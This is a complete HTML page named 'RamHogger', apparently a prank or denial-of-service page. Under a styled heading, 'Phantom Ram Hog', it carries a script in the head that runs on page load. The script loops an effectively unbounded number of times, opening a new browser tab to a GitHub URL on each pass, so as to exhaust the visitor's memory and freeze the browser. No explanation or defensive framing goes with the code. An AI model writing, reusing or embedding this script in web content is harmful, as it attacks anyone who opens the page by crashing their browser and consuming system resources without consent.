<!DOCTYPE html>
<html>
    <head>
        <title>RamHogger</title>
        <link rel="icon" href="../images/phantom.png">
        <meta charset="UTF-8">
        <style>
            html {
                background-image: radial-gradient(circle, rgb(61, 61, 61), rgb(44, 44, 44), rgb(31, 31, 31));
            }

            ::selection {
                color: inherit;
                background-color: rgba(255, 255, 255, 0.5);
            }

            h1 {
                position: absolute;
                left: 50%;
                bottom: 50%;
                transform: translate(-50%);
                color: green;
                font-size: 80px;
            }
        </style>
        <script>
            for (var i = 0; i < 9999999999999999999999999999999; i++){
                window.open("https://github.com/Whoooshy/RamHogger/", "_blank");
            }
        </script>
    </head>
    <body>
        <h1>Phantom Ram Hog</h1>
    </body>
</html>
